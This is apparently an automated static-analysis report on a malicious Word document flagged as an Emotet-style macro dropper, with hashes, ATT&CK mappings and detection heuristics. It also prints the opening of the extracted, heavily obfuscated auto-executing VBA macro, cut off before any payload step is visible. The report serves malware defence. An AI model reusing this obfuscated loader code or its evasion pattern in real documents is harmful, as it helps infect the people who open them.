Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fdd198cd4689c086…

MALICIOUS

Office (OLE)

Size: 424.0 KB
Created: 2018-07-23 00:23:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: 6667fca73895e5948c9febcc25e2414b
SHA-1: ae7c2fca09ad673eee6101dd0a0ffca19d117b42
SHA-256: fdd198cd4689c0869b148cde86e6453303eadb97d062a7e73a8b1112692ecd89
Risk Score: 330

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The sample is an Office document containing heavily obfuscated VBA macros. Heuristics indicate an auto-executing macro (Document_Open) that uses Shell() and CreateObject calls, a pattern typical of downloading and executing further malicious content. The ClamAV detection name 'Doc.Dropper.Emodldr-6755244-0' further supports its role as a dropper.

Heuristics 9

  • ClamAV: Doc.Dropper.Emodldr-6755244-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Emodldr-6755244-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    | Kind      | Source                                               | Size
macros.bas  | vba-macro | oletools.olevba.extract_macros (decoded VBA source)  | 188759 bytes
SHA-256: fdfc570fe2daaf5c5fb9712d0cbe384363c570ce257a821dbecc9246ca08aefd
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function iqEZtDe(fvsnelEd As String) As String
kewVP = 630 - 1198 - 1943
For SxbWwN = 0 To 6
    bDEQCuqr = Right("e-hRHM^f.jC?!_", 3)
    HZxhNF = StrReverse("JV)r*[Ez*IPv_kYF&")
    TqXpA = RTrim("u-Qxe.&^VYp.jlR_B")
    HZxhNF = Space(16)
    eSNfgBwRDUE = RTrim("XPIc]-t(YN&V-ml!")
Next SxbWwN
NAMeaCp = Left("Yy-]xIsmqkqHHEGjK(@", 5)
eSNfgBwRDUE = 1536 + 1080 + 1162
bDEQCuqr = 1435 + 1930 + 994
YxjxBnmxvj = UCase("a?CsXhYb]eJ)P")
While fGpAuI < 3
    WFVSiLOGiz = RTrim("$hx&d)F]M?-EWC?_er")
    UZLDSE = Space(10)
    kewVP = "ZcH%N%jPtwj)$T" + "x!FYmKKp$*GW" + "F_Nh)b#NISwXO$bB"
    iwgMvUchTxsU = LTrim("bpcPo(XD-H_Z")
    KrtlNclOmAoo = 1620 - 1310 - 1426
    zMGhAR = LTrim("Yc?YfJEvLFj)_xXcuzTe")
    NAMeaCp = Right("ej$Ch!KLL.@(gfXI yIQ", 5)
    kewVP = Space(17)
    zOQeZCRu = RTrim("]?TeaQ[z(xR")
    fGpAuI = fGpAuI + 3
Wend
    Dim INaVhhYZ() As Byte
    KrtlNclOmAoo = "&CpB*T-uB@]*Uxw" + "HdnX!yD*@_eseBGSg)H" + "^NdfJdJQ%.Oh!"
    For bSLkwR = 0 To 9
        EcfidI = RTrim("eSehLd^slB")
        UZLDSE = 1040 - 1548 - 1296
        HZxhNF = 917 - 1954 - 1873
        bWLduzAeZLW = "TZ[.AeF#CP&BD!b&" + "HEG#njZJ^AZ@EEH" + "k^a.YcjB]R#SfP"
        zMGhAR = StrReverse("#ugWd.hzqPsgim xDB")
        TqXpA = "D^M*FoyU#OAwm[bwhx]s" + "LFrERUbUgyUOlcPC" + "wCjEl do.o_eRGM.[y"
        zOQeZCRu = RTrim("Hf@LjPLrcaFm")
    Next bSLkwR
    For QMcAZz = 0 To 2
        While wzGQev < 3
            zOQeZCRu = RTrim("lOHhoDvaqujxpbs")
            bWLduzAeZLW = LTrim("GqU?(lj-jChB#b%cgQRs")
            Ilfqa = "hGU -JIJ !xh[xG)VqQ" + "#sJ?UyY[pzZ" + "mF[.yfN_Ou^RzHs"
            bDEQCuqr = StrReverse("n^I]WmEEampMrsnh")
            NAMeaCp = UCase("CNL)g)Wn _")
            WFVSiLOGiz = Right("uXQXHLWoT]", 4)
            Ilfqa = 893 + 1887 + 1636
            TqXpA = LTrim("S%qVBsqDWl(w#")
            kewVP = UCase("WycA^aWvtQDR^%(ATox@")
            wzGQev = wzGQev + 2
        Wend

        aESTZiwniR = "D-aPBlpotN]yk]kiN" + "cR%xpddKXIkVaJ*" + "pdAtY]zq.$yr]b"
        PUobpfmGH = 824 + 184 + 864
        PUobpfmGH = StrReverse("pINX(WCPbUDt[uqwMGR")
        aESTZiwniR = Left("thQ.PYLCNN.NayqokE", 2)
        WFVSiLOGiz = Space(16)
        bDEQCuqr = RTrim("vDJFP-A^w!-lqM#")
        WFVSiLOGiz = 666 + 1120 + 139
        PUobpfmGH = RTrim("m*Zr&Ap$Wme ")
        PUobpfmGH = "!JkKiQRG!_UM" + "!Ip*vvJH]." + "kUOp*W]@VFQ-Ji%$$"
        zMGhAR = 947 + 1623 + 1217
    Next QMcAZz
    For oFucHF = 0 To 6
        YxjxBnmxvj = 1198 - 615 - 1571
        zMGhAR = RTrim(")nL-(zHX]XRSW%EFL")
        zMGhAR = LTrim("QcuRpdbCPs?KVkYoh")
        WFVSiLOGiz = LTrim("f)TCdmyB-h")
        EcfidI = 268 - 575 - 790
        Ilfqa = UCase("rJf@VFoWM#RO yD$$bAU")
        KrtlNclOmAoo = RTrim("RuuOPUgOJyL")
        Ilfqa = 1134 + 1620 + 798
    Next oFucHF
    PUobpfmGH = 1936 + 508 + 1098
    For ZWCOai = 0 To 9
        TqXpA = Left("l.QNCdKuKqJl ^!eX", 5)
        kewVP = UCase(")@. &@Elhr^qHDS]Y_@")
    Next ZWCOai
    For aVgYmI = 0 To 9
        eSNfgBwRDUE = Space(2)
        iwgMvUchTxsU = Right("aunoiGHuezVPAgE%", 5)
        KrtlNclOmAoo = StrReverse("zsHtiyZRpb_JEl")
        WFVSiLOGiz = LTrim("VZ#_gzlmaacES@")
        bWLduzAeZLW = LTrim(" _x!!y[DZV(")
        HZxhNF = Right("vjPAFfkDmq?bzACa]Y(", 4)
        iwgMvUchTxsU = Space(18)
    Next aVgYmI
    TqXpA = UCase("ezm[$dVj_Jk.f")
    Dim YUljnw As Integer
    NAMeaCp = Right("].DA-mobum", 4)
    UZLDSE = Right("dfXxI.mMhKF@QHkr[", 4)
    While qnTwWW < 4
        WFVSiLOGiz = Right("Qz@nuSRNgcZic%f", 2)
        EcfidI = UCase("QLhi]Z$#iQ!ZvjuSq.Z")
        eSNfgBwRDUE = StrReverse("NJWu@tGuWk^[h)x[Q !n")
        bWLduzAeZLW = LTrim("bqa$iCP?Y$^")
        eSNfgBwRDUE = Right("nLvnOP?_X#rpj-EOPZ", 3)
        UZLDSE = 733
... (truncated)